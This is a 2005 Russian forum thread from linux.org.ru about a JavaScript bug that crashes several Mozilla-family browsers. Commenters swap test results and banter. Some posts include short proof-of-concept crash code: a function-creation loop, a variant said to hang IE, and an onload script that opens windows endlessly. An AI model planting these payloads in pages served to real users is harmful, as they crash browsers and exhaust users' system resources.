LINUX.ORG.RU

Уязвимость во многих браузерах семейства Mozilla


0

0
Paul Kurczaba сообщает об уязвимости в семействе Mozilla-ориентированных браузеров. Сформировав специальную JavaScript-функцию, атакующий может вызвать отказ браузера. Автором выпущены 2 варианта подобной атаки - один предполагает участие пользователя, второй не требует участия. Уязвимости подвержены: Mozilla 1.7.8, Firefox 1.0.4, Camino 0.8.4. В качестве меры противодействия рекомендуется убрать разрешение на запуск JavaScript.

>>> Подробности



Проверено: Shaman007 ()
ff 1.0.4 winxp - работает
дома на mozill`е проверю
diavolo
()
Источник - uinc.ru
pinkler
() автор топика
Работает-работает и на ff4 под линукс и под windows-( Ждем багфигка, берем из nightly -)
Ism
()
Ответ на: комментарий от anonymous
>Это уже диагноз новая дырка каждую неделю :)

Ну не совсем дырка, темболее совсем неопасная

Orlangoor ★★★★★
()
> В качестве меры противодействия рекомендуется убрать разрешение на запуск JavaScript.

Еще бы убедить идиотов-вебламеров, чтобы делали сайты по нормальному:
то есть так, чтобы джопаскрипт не был единственным вариантом навигации...
anonymous
()
Ответ на: комментарий от anonymous
В качестве меры противодействия рекомендуется выкинуть Mozilla soft и выпить йаду)
anonymous
()
Ответ на: комментарий от anonymous

А вот как это осуществляется

Вот функция, которая вешает Мозиллу:

function CrashFirefox()
{
    //Run the function 20000 times
    for (a = 0; a <= 20000; a++)
    {
        //Here is the special code that terminates the browser
        function(){};
    }
	
    //Displays an alert to notify the user if the browser is not vulnerable.
    alert("Good news - Your browser is not vulnerable.");
}

Короче, просто в цикле порождается много пустых функций. И Мозилла падает. Что характерно - IE нормально (и очень быстро) отрабатывает. Похоже, там защита стоит от этого.

Есть теория, что бесконечное число мартышек с компьютерами когда-нибудь смогут написать "Войну и мир". Она до сих пор не доказана. Зато точно известно, что под силу бесконечному числу мартышек - находить новые уязвимости в браузерах.
anonymous
()
Работает, хотя у меня из функций жабаскрипт включено только изменение изображений - в первом случае окно закрывается, во втором - зависает.
mikhail
()
Ответ на: комментарий от anonymous
>В качестве меры противодействия рекомендуется выклуючить ПК.
возможное падение браузера настолько критичнo?
Anonymous ★★★★★
()
Ответ на: комментарий от anonymous
> Так для этого есть Preference tool bar - одним кликом отключаешь и включаешь JS :)

ага, сразу после падения браузера...
anonymous
()
Ответ на: А вот как это осуществляется от anonymous
глупый баг какой-то :)

>Есть теория

закон больших чисел. Если постоянно и бесконечно искать и находить баги /c постоянной вероятностью их нахождения/, то их нахождение станет не случайным, а закономерным :(

Pi ★★★★★
()
firefox 1.0.4 c mozilla.org падает firefox 1.0.2 из убунту уже нет
JB ★★★★★
()
Слава ВЕЛИКОМУ МАНИТУ , Шо Я использую непревзойденный бровзер ИЕ! а то б валялся б щас где-нибудь на дне Ниагарского водопада!
anonymous
()
Это хорошо, что код чистят понемногу. Слава мартышкам!
anonymous
()
а knoqueror-у хоть бы хны :)

// wbr

klalafuda ★☆☆
()
Достала джава эта дырявая. Из-за неё больше половины всех дыр. Обычная ссылка уже не катит? Че все пихают куда надо и куда не надо эту пакость?
manokur ★★
()
Ответ на: комментарий от anonymous
Бред это всё собачий!!!

Народ кто нить положите где-нить на сайте у себя

ту же страничку, только

функцию CrashFirefox замените на приведённую ниже....

и запостите новость типа, IE зависает намертво ещё и грузя ресурсы машины офигенно.... Хотя тот же самый Firefox предлагает прервать слишком долгий скрипт....

function CrashFirefox() { var test = 0; //Run the function 20000 times for (a = 0; a <= 1000000; a++) { //Here is the special code that terminates the browser test = test + function( test ){ return test++;}; } document.write(test); //Displays an alert to notify the user if the browser is not vul alert("Good news - Your browser is not vulnerable."); }

romaxa
()
Ну почему уязвимость то? Дебилизм уже просто.. Это же обычный BUG. Писец.. все помешаны на "уязвимостях".. В чём тут уязвимость то? И уязвимость чего? брр... бесит
ydanneg
()
Ответ на: комментарий от anonymous
>А еще если мышкой помахать на FF проц грузит чрезмерно.

потому что это магия высшего порядка, недоступная виндовозному ламерью

anonymous
()
Ответ на: комментарий от manokur
> Достала джава эта дырявая.

Достали дятлы, неспособные отличить java от javascript

anonymous
()
Ответ на: комментарий от Pi
> закон больших чисел. Если постоянно и бесконечно искать и находить баги /c постоянной вероятностью их нахождения/, то их нахождение станет не случайным, а закономерным :(

Сколько развелось разных трактований ЗВЧ. Он же говорит при каких условиях на последовательность случайных чисел En, (1/n)Sum|En-MEn| сходится к 0 за вероятностью.

anonymous
()
Ответ на: комментарий от anonymous
> Хороший повод с дрявой мозиллы перейти на Оперу

Я уже для IE написал чрень которая будет вешать IE как нефик делать...

Написать тоже самой для Oper-ы?

romaxa
()
Ответ на: комментарий от anonymous
> Хороший повод с дрявой мозиллы перейти на Оперу

Ты у нас всегда навстречу основному потоку движешься? Сейчас вообще-то люди в основном с оперы на ff переползают.

anonymous
()
Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 -- работает :,(
Windophob
()
Ответ на: комментарий от anonymous
и отловить корок. мсье понимает толк в извращениях
anonymous
()
мда. вот вам тогда еще одна "уязвимость" - нашел еще года два назад. Мозилла просто падает, ИЕ пораждает множество окон и если вовремя не прибить, то уносит за собой ОС, на других браузерах не пробовал, если кто попробует, то напишите о поведении... <body onload="javascript:for(;;)open('http://ie.sux/')">
KAdot
()
Ответ на: комментарий от anonymous
в неё надо поставить неуд :)

ибо к нулю! т.к. ЗБЧ говорит о сходимости среднего арифметического величин к среднему арифметическому матожиданий

deil
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.